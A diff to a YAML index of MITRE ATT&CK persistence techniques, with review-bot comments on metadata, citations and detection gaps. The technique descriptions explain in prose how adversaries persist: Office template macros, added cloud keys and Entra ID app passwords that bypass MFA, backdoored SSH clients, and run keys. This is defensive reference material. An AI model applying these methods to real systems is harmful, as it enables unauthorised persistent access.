- description: Microsoft. (n.d.). Change the Normal template (Normal.dotm).
- Retrieved July 3, 2017.
- source_name: Microsoft Change Normal Template
- - url: https://msdn.microsoft.com/en-us/vba/office-shared-vba/articles/getting-started-with-vba-in-office
- description: Austin, J. (2017, June 6). Getting Started with VBA in Office.
- Retrieved July 3, 2017.
- source_name: MSDN VBA in Office
- - url: https://enigma0x3.net/2014/01/23/maintaining-access-with-normal-dotm/comment-page-1/
- description: Nelson, M. (2014, January 23). Maintaining Access with normal.dotm.
- Retrieved July 3, 2017.
- source_name: enigma0x3 normal.dotm
- - url: http://www.hexacorn.com/blog/2017/04/19/beyond-good-ol-run-key-part-62/
- description: Hexacorn. (2017, April 17). Beyond good ol’ Run key, Part 62.
- Retrieved July 3, 2017.
- source_name: Hexacorn Office Template Macros
- - source_name: GlobalDotName Jun 2019
- url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique
- description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName
- - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.
- - source_name: CrowdStrike Outlook Forms
- url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746
- description: Parisi, T., et al. (2017, July). Using Outlook Forms for Lateral
- Movement and Persistence. Retrieved February 5, 2019.
- - source_name: Outlook Today Home Page
- url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
- description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
- Retrieved February 5, 2019.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T16:01:35.918Z'
name: 'Office Application Startup: Office Template Macros.'
description: "Adversaries may abuse Microsoft Office templates to obtain persistence
on a compromised system. Microsoft Office contains templates that are part
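Review bot: This hunk removes the whole head of the T1137.001 object (`x_mitre_platforms`, `x_mitre_domains`, `object_marking_refs`, `id`, `type`, `created`, `created_by_ref` and all eight `external_references`) while only the `modified` line is replaced in place; the removed fields reappear lower in the same object in a later hunk of this patch, so the two hunks have to be read together to confirm nothing was lost. Checked against that later hunk, the same eight references are present, but a 55-line removal for what is a key-order change is exactly the churn a canonical key order in the generator would avoid.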
@@ -31541,6 +31903,7 @@ persistence:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: 'Many Office-related persistence mechanisms require changes
to the Registry and for binaries, files, or scripts to be written to disk
or existing files modified to include malicious scripts. Collect events related
@@ -31550,9 +31913,13 @@ persistence:
also be investigated since the base templates should likely not contain VBA
macros. Changes to the Office macro security settings should also be investigated.(Citation:
GlobalDotName Jun 2019)'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - Office Suite
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'File: File Creation'
- 'Windows Registry: Windows Registry Key Modification'
@@ -31560,11 +31927,47 @@ persistence:
- 'Process: Process Creation'
- 'Windows Registry: Windows Registry Key Creation'
- 'File: File Modification'
- x_mitre_permissions_required:
- - User
- - Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--79a47ad0-fc3b-4821-9f01-a026b1ddba21
+ created: '2019-11-07T20:29:17.788Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1137/001
+ external_id: T1137.001
+ - source_name: MSDN VBA in Office
+ description: Austin, J. (2017, June 6). Getting Started with VBA in Office.
+ Retrieved July 3, 2017.
+ url: https://msdn.microsoft.com/en-us/vba/office-shared-vba/articles/getting-started-with-vba-in-office
+ - source_name: Hexacorn Office Template Macros
+ description: Hexacorn. (2017, April 17). Beyond good ol’ Run key, Part 62.
+ Retrieved July 3, 2017.
+ url: http://www.hexacorn.com/blog/2017/04/19/beyond-good-ol-run-key-part-62/
+ - source_name: Microsoft Change Normal Template
+ description: Microsoft. (n.d.). Change the Normal template (Normal.dotm).
+ Retrieved July 3, 2017.
+ url: https://support.office.com/article/Change-the-Normal-template-Normal-dotm-06de294b-d216-47f6-ab77-ccb5166f98ea
+ - source_name: enigma0x3 normal.dotm
+ description: Nelson, M. (2014, January 23). Maintaining Access with normal.dotm.
+ Retrieved July 3, 2017.
+ url: https://enigma0x3.net/2014/01/23/maintaining-access-with-normal-dotm/comment-page-1/
+ - source_name: CrowdStrike Outlook Forms
+ description: Parisi, T., et al. (2017, July). Using Outlook Forms for Lateral
+ Movement and Persistence. Retrieved February 5, 2019.
+ url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746
+ - source_name: GlobalDotName Jun 2019
+ description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName
+ - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.
+ url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique
+ - source_name: Outlook Today Home Page
+ description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
+ Retrieved February 5, 2019.
+ url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1137.001
atomic_tests: []
T1546.009:
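Review bot: The re-added block matches the one removed earlier in the patch field for field: the eight `external_references` are all present in a different order, with each entry now written `source_name`, `description`, `url` instead of `url`, `description`, `source_name`, and the only substantive differences are the new `revoked: false` and the dropped `x_mitre_permissions_required` list (User, Administrator), which is consistent with the spec 3.2.0 bump. Because both key order and reference order changed, a line diff cannot show this equivalence; loading both versions and comparing the parsed mappings is the reliable check before merging.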
@@ -31596,7 +31999,7 @@ persistence:
description: Microsoft. (2007, October 24). Windows Sysinternals - AppCertDlls.
Retrieved December 18, 2017.
source_name: Sysinternals AppCertDlls Oct 2007
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-10T18:29:31.052Z'
name: 'Event Triggered Execution: AppCert DLLs'
description: "Adversaries may establish persistence and/or elevate privileges
by executing malicious content triggered by AppCert DLLs loaded into processes.
@@ -31644,13 +32047,11 @@ persistence:
x_mitre_effective_permissions:
- Administrator
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1546.009
atomic_tests: []
T1098.005:
technique:
- modified: '2023-10-03T17:38:39.065Z'
+ modified: '2024-09-25T20:39:53.597Z'
name: Device Registration
description: "Adversaries may register a device to an adversary-controlled account.
Devices may be registered in a multifactor authentication (MFA) system, which
@@ -31663,16 +32064,16 @@ persistence:
FireEye SolarWinds) In some cases, the MFA self-enrollment process may require
only a username and password to enroll the account's first device or to enroll
a device to an inactive account. (Citation: Mandiant APT29 Microsoft 365 2022)\n\nSimilarly,
- an adversary with existing access to a network may register a device to Azure
- AD and/or its device management system, Microsoft Intune, in order to access
+ an adversary with existing access to a network may register a device to Entra
+ ID and/or its device management system, Microsoft Intune, in order to access
sensitive data or resources while bypassing conditional access policies.(Citation:
AADInternals - Device Registration)(Citation: AADInternals - Conditional Access
- Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Azure AD may
+ Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Entra ID may
be able to conduct [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)
campaigns via intra-organizational emails, which are less likely to be treated
as suspicious by the email client.(Citation: Microsoft - Device Registration)
Additionally, an adversary may be able to perform a [Service Exhaustion Flood](https://attack.mitre.org/techniques/T1499/002)
- on an Azure AD tenant by registering a large number of devices.(Citation:
+ on an Entra ID tenant by registering a large number of devices.(Citation:
AADInternals - BPRT)"
kill_chain_phases:
- kill_chain_name: mitre-attack
@@ -31684,16 +32085,16 @@ persistence:
- Mike Moran
- Joe Gumke, U.S. Bank
- Arad Inbar, Fidelis Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Azure AD
- Windows
- - SaaS
- x_mitre_version: '1.2'
+ - Identity Provider
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Active Directory: Active Directory Object Creation'
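Review bot: For T1098.005 the platform change is not only a rename: `SaaS` is removed along with `Azure AD`, and only `Identity Provider` is added next to `Windows`, so the technique no longer maps to any SaaS platform. The 1.2 to 1.3 version bump and the added contributor (Arun Seelagan, CISA) indicate a deliberate upstream revision, but any SaaS-scoped view of this index will lose the technique and that should be stated in the commit message.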
@@ -31748,7 +32149,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1542:
technique:
@@ -31809,7 +32209,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1547.015:
technique:
@@ -31885,7 +32284,7 @@ persistence:
url: https://developer.apple.com/library/archive/documentation/General/Reference/InfoPlistKeyReference/Articles/LaunchServicesKeys.html#//apple_ref/doc/uid/TP40009250-SW1
description: Apple. (2018, June 4). Launch Services Keys. Retrieved October
5, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T16:36:37.042Z'
name: 'Boot or Logon Autostart Execution: Login Items'
description: |-
Adversaries may add login items to execute upon user login to gain persistence or escalate privileges. Login items are applications, documents, folders, or server connections that are automatically launched when a user logs in.(Citation: Open Login Items Apple) Login items can be added via a shared file list or Service Management Framework.(Citation: Adding Login Items) Shared file list login items can be set using scripting languages such as [AppleScript](https://attack.mitre.org/techniques/T1059/002), whereas the Service Management Framework uses the API call SMLoginItemSetEnabled
.
@@ -31913,8 +32312,6 @@ persistence:
- 'File: File Modification'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1547.015
atomic_tests: []
T1205.001:
@@ -31940,7 +32337,7 @@ persistence:
description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible
backdoor. Retrieved October 13, 2018.'
source_name: Hartrell cd00r 2002
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T18:31:23.996Z'
name: Port Knocking
description: |-
Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.
@@ -31965,23 +32362,21 @@ persistence:
- 'Network Traffic: Network Traffic Flow'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1098.001:
technique:
- modified: '2024-02-28T14:35:00.862Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Account Manipulation: Additional Cloud Credentials'
description: "Adversaries may add adversary-controlled credentials to a cloud
account to maintain persistent access to victim accounts and instances within
the environment.\n\nFor example, adversaries may add credentials for Service
Principals and Applications in addition to existing legitimate credentials
- in Azure AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue
- Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include
- both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance)
- With sufficient permissions, there are a variety of ways to add credentials
- including the Azure Portal, Azure command line interface, and Azure or Az
- PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn
+ in Azure / Entra ID.(Citation: Microsoft SolarWinds Customer Guidance)(Citation:
+ Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials
+ include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer
+ Guidance) With sufficient permissions, there are a variety of ways to add
+ credentials including the Azure Portal, Azure command line interface, and
+ Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn
infrastructure-as-a-service (IaaS) environments, after gaining access through
[Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries
may generate or import their own SSH keys using either the CreateKeyPair
@@ -31991,11 +32386,15 @@ persistence:
usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation:
Expel Behind the Scenes)\n\nAdversaries may also use the CreateAccessKey
API in AWS or the gcloud iam service-accounts keys create
command
- in GCP to add access keys to an account. If the target account has different
- permissions from the requesting account, the adversary may also be able to
- escalate their privileges in the environment (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation:
+ in GCP to add access keys to an account. Alternatively, they may use the CreateLoginProfile
+ API in AWS to add a password that can be used to log into the AWS Management
+ Console for [Cloud Service Dashboard](https://attack.mitre.org/techniques/T1538).(Citation:
+ Permiso Scattered Spider 2023)(Citation: Lacework AI Resource Hijacking 2024)
+ If the target account has different permissions from the requesting account,
+ the adversary may also be able to escalate their privileges in the environment
+ (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation:
Rhino Security Labs AWS Privilege Escalation)(Citation: Sysdig ScarletEel
- 2.0) For example, in Azure AD environments, an adversary with the Application
+ 2.0) For example, in Entra ID environments, an adversary with the Application
Administrator role can add a new set of credentials to their application's
service principal. In doing so the adversary would be able to access the service
principal’s roles and permissions, which may be different from those of the
@@ -32006,12 +32405,19 @@ persistence:
tied to the permissions of the original user account. These temporary credentials
may remain valid for the duration of their lifetime even if the original account’s
API credentials are deactivated.\n(Citation: Crowdstrike AWS User Federation
- Persistence)"
+ Persistence)\n\nIn Entra ID environments with the app password feature enabled,
+ adversaries may be able to add an app password to a user account.(Citation:
+ Mandiant APT42 Operations 2024) As app passwords are intended to be used with
+ legacy devices that do not support multi-factor authentication (MFA), adding
+ an app password can allow an adversary to bypass MFA requirements. Additionally,
+ app passwords may remain valid even if the user’s primary password is reset.(Citation:
+ Microsoft Entra ID App Passwords)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Expel
- Oleg Kolesnikov, Securonix
@@ -32020,6 +32426,7 @@ persistence:
- Alex Soler, AttackIQ
- Dylan Silva, AWS Security
- Arad Inbar, Fidelis Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: |-
Monitor Azure Activity Logs for Service Principal and Application modifications. Monitor for the usage of APIs that create or import SSH keys, particularly by unexpected users or accounts such as the root account.
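Review bot: `x_mitre_detection` on the last context line still covers only Service Principal and Application modifications in Azure Activity Logs and APIs that create or import SSH keys, while the description in this patch now also names `CreateAccessKey`, `CreateLoginProfile` (console password) and Entra ID app passwords as ways to add credentials. If the upstream text was not updated this can ship as is, but then the `Active Directory: Active Directory Object Creation` and `Object Modification` data sources added further down are the only pointer to where app-password or login-profile additions would surface; a sentence in the detection text naming console login-profile creation and app-password registration would close that gap.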
@@ -32028,13 +32435,16 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- IaaS
- - Azure AD
- SaaS
- x_mitre_version: '2.7'
+ - Identity Provider
+ x_mitre_version: '2.8'
x_mitre_data_sources:
- 'User Account: User Account Modification'
+ - 'Active Directory: Active Directory Object Creation'
+ - 'Active Directory: Active Directory Object Modification'
type: attack-pattern
id: attack-pattern--8a2f40cf-8325-47f9-96e4-b1ca4c7389bd
created: '2020-01-19T16:10:15.008Z'
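Review bot: `- Azure AD` is dropped from `x_mitre_platforms` and `- Identity Provider` added, but the description earlier in this patch was rewritten to say "Azure / Entra ID" and "Entra ID environments", so the platform list and the prose now use different vocabularies for the same thing. Acceptable if it mirrors upstream, but note that the two new data sources, `Active Directory: Active Directory Object Creation` and `Object Modification`, are on-premises directory sources attached to a technique whose platforms are now IaaS, SaaS and Identity Provider; readers filtering this index by data source will find that surprising without a comment.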
@@ -32060,10 +32470,18 @@ persistence:
description: Bellavance, Ned. (2019, July 16). Demystifying Azure AD Service
Principals. Retrieved January 19, 2020.
url: https://nedinthecloud.com/2019/07/16/demystifying-azure-ad-service-principals/
+ - source_name: Lacework AI Resource Hijacking 2024
+ description: Detecting AI resource-hijacking with Composite Alerts. (2024,
+ June 6). Lacework Labs. Retrieved July 1, 2024.
+ url: https://www.lacework.com/blog/detecting-ai-resource-hijacking-with-composite-alerts
- source_name: GCP SSH Key Add
description: Google. (n.d.). gcloud compute os-login ssh-keys add. Retrieved
October 1, 2020.
url: https://cloud.google.com/sdk/gcloud/reference/compute/os-login/ssh-keys/add
+ - source_name: Permiso Scattered Spider 2023
+ description: 'Ian Ahl. (2023, September 20). LUCR-3: SCATTERED SPIDER GETTING
+ SAAS-Y IN THE CLOUD. Retrieved September 25, 2023.'
+ url: https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud
- source_name: Blue Cloud of Death Video
description: 'Kunz, Bruce. (2018, October 14). Blue Cloud of Death: Red Teaming
Azure. Retrieved November 21, 2019.'
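Review bot: the new `Lacework AI Resource Hijacking 2024` reference has no author component, so its `description` starts with the title ("Detecting AI resource-hijacking with Composite Alerts. (2024, June 6). Lacework Labs."), unlike every other entry here, which leads with author then date. Reorder it to `Lacework Labs. (2024, June 6). Detecting AI resource-hijacking with Composite Alerts.` so rendered citations stay uniform; the `Permiso Scattered Spider 2023` entry copies the source's all-caps title, which is fine to keep but worth normalising if the generator already title-cases elsewhere.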
@@ -32072,10 +32490,20 @@ persistence:
description: 'Kunz, Bryce. (2018, May 11). Blue Cloud of Death: Red Teaming
Azure. Retrieved October 23, 2019.'
url: https://speakerdeck.com/tweekfawkes/blue-cloud-of-death-red-teaming-azure-1
+ - source_name: Microsoft Entra ID App Passwords
+ description: Microsoft. (2023, October 23). Enforce Microsoft Entra multifactor
+ authentication with legacy applications using app passwords. Retrieved May
+ 28, 2024.
+ url: https://learn.microsoft.com/en-us/entra/identity/authentication/howto-mfa-app-passwords
- source_name: Microsoft SolarWinds Customer Guidance
description: MSRC. (2020, December 13). Customer Guidance on Recent Nation-State
Cyber Attacks. Retrieved December 17, 2020.
url: https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/
+ - source_name: Mandiant APT42 Operations 2024
+ description: 'Ofir Rozmann, Asli Koksal, Adrian Hernandez, Sarah Bock, and
+ Jonathan Leathery. (2024, May 1). Uncharmed: Untangling Iran''s APT42 Operations.
+ Retrieved May 28, 2024.'
+ url: https://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations
- source_name: Expel Behind the Scenes
description: 'S. Lipton, L. Easterly, A. Randazzo and J. Hencinski. (2020,
July 28). Behind the scenes in the Expel SOC: Alert-to-fix in AWS. Retrieved
@@ -32092,14 +32520,11 @@ persistence:
url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098.001
atomic_tests: []
T1556.008:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-05-04T18:02:51.318Z'
name: Network Provider DLL
description: "Adversaries may register malicious network provider dynamic link
libraries (DLLs) to capture cleartext user credentials during the authentication
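Review bot: T1556.008's `modified` goes backwards, from `2023-10-31T14:00:00.188Z` to `2023-05-04T18:02:51.318Z`, and the same backwards move appears for T1546.014 (`2022-05-11T14:00:00.188Z` to `2022-04-20T00:16:01.732Z`) and T1574.010 (`2023-05-09T14:00:00.188Z` to `2023-03-30T21:01:37.026Z`). The old values all share the `14:00:00.188Z` suffix, which suggests they were placeholder timestamps rather than real STIX `modified` values, in which case the regression is a correction and should be stated in the commit message; if they were real, the source bundle this was regenerated from needs checking.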
@@ -32174,7 +32599,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546.003:
technique:
@@ -32263,24 +32687,27 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.003
atomic_tests: []
T1554:
technique:
- modified: '2024-04-16T13:03:40.824Z'
+ modified: '2024-10-12T16:52:46.067Z'
name: Compromise Host Software Binary
description: |-
Adversaries may modify host software binaries to establish persistent access to systems. Software binaries/executables provide a wide range of system commands or services, programs, and libraries. Common software binaries are SSH clients, FTP clients, email clients, web browsers, and many other user or server applications.
- Adversaries may establish persistence though modifications to host software binaries. For example, an adversary may replace or otherwise infect a legitimate application binary (or support files) with a backdoor. Since these binaries may be routinely executed by applications or the user, the adversary can leverage this for persistent access to the host.
+ Adversaries may establish persistence though modifications to host software binaries. For example, an adversary may replace or otherwise infect a legitimate application binary (or support files) with a backdoor. Since these binaries may be routinely executed by applications or the user, the adversary can leverage this for persistent access to the host. An adversary may also modify a software binary such as an SSH client in order to persistently collect credentials during logins (i.e., [Modify Authentication Process](https://attack.mitre.org/techniques/T1556)).(Citation: Google Cloud Mandiant UNC3886 2024)
An adversary may also modify an existing binary by patching in malicious functionality (e.g., IAT Hooking/Entry point patching)(Citation: Unit42 Banking Trojans Hooking 2022) prior to the binary’s legitimate execution. For example, an adversary may modify the entry point of a binary to point to malicious code patched in by the adversary before resuming normal execution flow.(Citation: ESET FontOnLake Analysis 2021)
+
+ After modifying a binary, an adversary may attempt to [Impair Defenses](https://attack.mitre.org/techniques/T1562) by preventing it from updating (e.g., via the `yum-versionlock` command or `versionlock.list` file in Linux systems that use the yum package manager).(Citation: Google Cloud Mandiant UNC3886 2024)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
x_mitre_contributors:
- CrowdStrike Falcon OverWatch
+ - Liran Ravich, CardinalOps
+ - Jamie Williams (U ω U), PANW Unit 42
x_mitre_deprecated: false
x_mitre_detection: "Collect and analyze signing certificate metadata and check
signature validity on software that executes within the environment. Look
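Review bot: the new Impair Defenses sentence names `yum-versionlock` as "the command"; `yum-versionlock` is the plugin and package name, while the command a defender would actually search for in shell history is `yum versionlock` (with `versionlock.list` under the plugin's config directory), so the backticked token may not match what shows up in logs. Separately, `x_mitre_detection` (the trailing context lines) still talks only about signing-certificate metadata and signature validity; the two sentences added here, SSH-client modification to harvest credentials and version-lock tampering to block updates, get no corresponding detection guidance, e.g. monitoring writes to `versionlock.list` and invocations of the package manager's lock subcommand.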
@@ -32294,7 +32721,7 @@ persistence:
- Linux
- macOS
- Windows
- x_mitre_version: '2.0'
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'File: File Deletion'
- 'File: File Modification'
@@ -32309,6 +32736,11 @@ persistence:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1554
external_id: T1554
+ - source_name: Google Cloud Mandiant UNC3886 2024
+ description: " Punsaen Boonyakarn, Shawn Chew, Logeswaran Nadarajan, Mathew
+ Potaczek, Jakub Jozwiak, and Alex Marvi. (2024, June 18). Cloaked and Covert:
+ Uncovering UNC3886 Espionage Operations. Retrieved September 24, 2024."
+ url: https://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations
- source_name: Unit42 Banking Trojans Hooking 2022
description: 'Or Chechik. (2022, October 31). Banking Trojan Techniques: How
Financially Motivated Malware Became Infrastructure. Retrieved September
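Review bot: the double-quoted `description` for `Google Cloud Mandiant UNC3886 2024` starts with a stray space (`" Punsaen Boonyakarn, Shawn Chew, ...`), which YAML preserves inside double quotes; every other reference description in the file starts directly with the author name. Trim it at the source so the rendered citation lines up with the rest.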
@@ -32322,11 +32754,10 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-12T15:27:11.065Z'
name: 'Event Triggered Execution: Change Default File Association'
description: "Adversaries may establish persistence by executing malicious content
triggered by a file type association. When a file is opened, the default program
@@ -32352,7 +32783,6 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: persistence
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- Travis Smith, Tripwire
- Stefan Kanthak
@@ -32366,7 +32796,6 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.0'
@@ -32393,8 +32822,8 @@ persistence:
url: https://support.microsoft.com/en-us/help/18539/windows-7-change-default-programs
- source_name: Microsoft File Handlers
description: Microsoft. (n.d.). Specifying File Handlers for File Name Extensions.
- Retrieved November 13, 2014.
- url: http://msdn.microsoft.com/en-us/library/bb166549.aspx
+ Retrieved September 12, 2024.
+ url: https://learn.microsoft.com/en-us/previous-versions/visualstudio/visual-studio-2015/extensibility/specifying-file-handlers-for-file-name-extensions?view=vs-2015
- source_name: Microsoft Assoc Oct 2017
description: Plett, C. et al.. (2017, October 15). assoc. Retrieved August
7, 2018.
@@ -32405,7 +32834,8 @@ persistence:
url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_fakeav.gzd
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1546.001
atomic_tests: []
T1546.014:
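Review bot: `x_mitre_attack_spec_version` and `x_mitre_modified_by_ref` are removed from the middle of T1546.001's block and re-added here at the end, whereas for T1098.001 and T1136.003 in this same patch the identical keys are removed from the end and inserted near the top; the generator is not emitting keys in a stable order. That inconsistency is harmless to YAML consumers but it is what turns the T1547.006 change further down into a 138-line hunk for what is essentially a timestamp update and one reference URL fix. Sorting keys (or preserving input order) in the index generator would make future regenerations reviewable.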
@@ -32446,7 +32876,7 @@ persistence:
The rule files are in the plist format and define the name, event type, and action to take. Some examples of event types include system startup and user authentication. Examples of actions are to run a system command or send an email. The emond service will not launch if there is no file present in the QueueDirectories path /private/var/db/emondClients
, specified in the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) configuration file at/System/Library/LaunchDaemons/com.apple.emond.plist
.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019)
Adversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019) Adversaries may also be able to escalate privileges from administrator to root as the emond service is executed with root privileges by the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) service.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T00:16:01.732Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Event Triggered Execution: Emond'
x_mitre_detection: Monitor emond rules creation by checking for files created
@@ -32466,12 +32896,11 @@ persistence:
- Administrator
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.014
atomic_tests: []
T1574.010:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:37.026Z'
name: Services File Permissions Weakness
description: |-
Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -32525,11 +32954,10 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
atomic_tests: []
T1547.001:
technique:
- modified: '2023-10-16T09:08:22.319Z'
+ modified: '2024-09-12T15:27:58.051Z'
name: 'Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder'
description: |-
Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.(Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.
@@ -32616,9 +33044,9 @@ persistence:
in the Registry. Retrieved August 3, 2020.
url: https://docs.microsoft.com/en-us/windows/win32/sysinfo/32-bit-and-64-bit-application-data-in-the-registry
- source_name: Microsoft Run Key
- description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
- 12, 2014.
